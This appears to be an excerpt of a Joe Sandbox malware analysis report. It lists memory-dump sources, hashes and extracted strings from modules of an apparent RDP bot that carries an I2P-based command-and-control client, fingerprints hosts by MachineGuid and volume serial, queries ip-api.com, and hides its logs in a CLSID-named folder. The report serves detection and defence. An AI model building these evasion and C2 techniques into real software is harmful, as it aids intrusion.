                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                                                                                                                                                  • Instruction ID: 496679b481f52713cffa1383241b7b3b0ca25ccd83f21ba4c5202b7748923bf6
                                                                                                                                                  • Opcode Fuzzy Hash: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                                                                                                                                                  • Instruction Fuzzy Hash: 0FD1A021E0C657C1FB249B9CE4807B867A0AF857D8F559037CB5E476A6DE2CEC84C781

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                                                                                                                                                  • Instruction ID: 8edfa61a3ad23a84cb5e80a9d20e3608ab21aee71f1b5c6bc15590d21f6cd4f1
                                                                                                                                                  • Opcode Fuzzy Hash: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                                                                                                                                                  • Instruction Fuzzy Hash: 9CD16F21E0C653C5FB208B9CAC803F826A0AB527D4F5560F2DF5E176A5DF2EB9448391

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                                                                                                                                                  • Instruction ID: 57d204d98a844dc10ff390f7b1ba0b97585744d8058b5b50d930e206ccf40b2a
                                                                                                                                                  • Opcode Fuzzy Hash: 072b15cb7d5467502121e7cc37fb0d8fa8f56b069e1ba42f5353c03d493d4b53
                                                                                                                                                  • Instruction Fuzzy Hash: 09D15965E0C7D781FB218F1DE8403B862A0AF417D4F964032DB5E472A6DE2DF884B792

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                                                                                                                                                  • Instruction ID: b3bf22cab428c52db068d7083d2ad9d40cce2f7d42920e4353f3dfbedd385ec5
                                                                                                                                                  • Opcode Fuzzy Hash: 4dc01b5f75b270360606047a0468cbd7355a8116ebbaa9ee14f43ce93feb006c
                                                                                                                                                  • Instruction Fuzzy Hash: F4D18D21E0C6D682FA60EF1CE4843B87A95AF417E4F564132CB9E072A2DE6DAC45B741

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                                                                                                                                                  • Instruction ID: 5e24a748ca0a910ce2c7f30d5d750ac1344da967546ca05caaa87a91743d58c4
                                                                                                                                                  • Opcode Fuzzy Hash: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                                                                                                                                                  • Instruction Fuzzy Hash: 4BD15B62E0C656D5FA249BDCE4723B9B7A0AF407D8F194132CB4E477A4DE2CF8848781

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Memory Dump Source
• Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
• Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                                                                                                                                                  • Instruction ID: c8acf4676f9279219e33657c2128e3d87b3181e9e905a3aa8b9e677f0e219a56
                                                                                                                                                  • Opcode Fuzzy Hash: bb319203d5cbb6e5fb51f96cff94c8619a199eb4c6fbc46879cfc4f1c9ae0bb2
                                                                                                                                                  • Instruction Fuzzy Hash: 52D14A66EDC66782FB209B9CE9403B973A0AF44BD4F554032CB4E17AA5DE3DEC848741

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
• Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                                                                                                                                  • API String ID: 3828489143-3798070276
                                                                                                                                                  • Opcode ID: e1b7c46f77d045b6d29ba8d43c4d9af711e08a04f013bfcd733600930ec2894c
                                                                                                                                                  • Instruction ID: 3ea174c2af83ddeba95a1d1f9281e7789a84695f8ff532ed2032cc74ce040f67
                                                                                                                                                  • Opcode Fuzzy Hash: e1b7c46f77d045b6d29ba8d43c4d9af711e08a04f013bfcd733600930ec2894c
                                                                                                                                                  • Instruction Fuzzy Hash: A6D14B22E0C65391FA709B5CE540BB97270EBB8755F950033FB4ED76A8DE2DE8648381

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
• Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$TGER$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$h$ip-api.com$last-patch$mem_alloc$referrer
                                                                                                                                                  • API String ID: 0-3139374006
                                                                                                                                                  • Opcode ID: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                                                                                                                                                  • Instruction ID: fad7b1b2de246126d52592ebaaa2794690377ae170ecaacc6295d77309f1d893
                                                                                                                                                  • Opcode Fuzzy Hash: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                                                                                                                                                  • Instruction Fuzzy Hash: 3F124C72A0C68286EB608B9DE4803B9B7A0EB887D4F544235DB9D477E6DF7CE554CB00

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
• Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcat$HandleLibraryLoadModule
                                                                                                                                                  • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                                                                                                                                  • API String ID: 1893813203-492052463
                                                                                                                                                  • Opcode ID: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                                                                                                                                                  • Instruction ID: 105556b51660528c26000f71e2e3f01d013de8393248e407d63bcaaaab8658c6
                                                                                                                                                  • Opcode Fuzzy Hash: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                                                                                                                                                  • Instruction Fuzzy Hash: 3B719C31A1DB8392EB219B99E4803FA6395EB887C0F845131DB4D4BB9AEF3CD905C740

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
• Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                                                                                                                                  • API String ID: 3395718042-2735303109

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                                                                                                                                  • API String ID: 3395718042-1297835036

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                                                                                                                                  • API String ID: 3395718042-1794035234
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                                                                                                                                  • API String ID: 3395718042-2859552336
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                                                                                                                                  • API String ID: 3395718042-190452282
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                                                                                                                                  • API String ID: 3395718042-315528054
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  APIs
                                                                                                                                                  Strings
